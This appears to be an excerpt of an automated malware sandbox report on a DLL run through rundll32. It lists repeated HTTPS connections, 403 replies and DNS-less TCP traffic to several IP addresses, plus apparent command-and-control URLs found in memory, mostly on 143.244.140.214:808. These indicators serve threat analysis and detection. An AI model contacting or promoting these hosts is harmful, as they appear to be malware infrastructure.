                      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: rundll32.exe, 00000004.00000003.366467618.0000000002D1B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000004.00000003.382346798.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: rundll32.exe, 00000004.00000003.387226300.0000000002D14000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000004.00000003.382386237.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6d0503f021f39
                      Source: loaddll32.exe, 00000001.00000003.384120103.00000000039D2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?98c1ae8a95e1a
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabEYS
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en;
                      Source: rundll32.exe, 00000004.00000003.765380273.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://14.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.745615724.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://142.46.210.220/
                      Source: rundll32.exe, 00000004.00000003.398890525.0000000004EF1000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/-
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/U
                      Source: rundll32.exe, 00000004.00000003.506376405.0000000002D9C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.593936037.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.497852377.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: rundll32.exe, 00000004.00000003.585389887.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/$
                      Source: rundll32.exe, 00000004.00000003.593936037.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/%
                      Source: rundll32.exe, 00000004.00000003.610683609.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.556057703.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/(
                      Source: rundll32.exe, 00000004.00000003.556057703.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/)
                      Source: rundll32.exe, 00000004.00000003.636197167.0000000002D1A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/hy
                      Source: rundll32.exe, 00000004.00000003.585389887.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/1
                      Source: rundll32.exe, 00000004.00000003.497852377.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/6
                      Source: rundll32.exe, 00000004.00000002.776205925.0000000002D14000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/8D
                      Source: rundll32.exe, 00000004.00000003.585389887.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/_
                      Source: rundll32.exe, 00000004.00000003.568164279.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/em32
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/g
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.610683609.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.585389887.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.737249109.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: rundll32.exe, 00000004.00000003.585389887.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/jQX%
                      Source: rundll32.exe, 00000004.00000003.568493261.0000000002D9C000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/k
                      Source: rundll32.exe, 00000004.00000003.367951462.0000000002D1B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: rundll32.exe, 00000004.00000003.522936268.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l%
                      Source: rundll32.exe, 00000004.00000003.610683609.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l6
                      Source: rundll32.exe, 00000004.00000003.636197167.0000000002D1A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: rundll32.exe, 00000004.00000003.522936268.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lln
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ln
                      Source: rundll32.exe, 00000004.00000003.568164279.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/n
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.745615724.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.568164279.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522936268.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: rundll32.exe, 00000004.00000003.568164279.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/p#
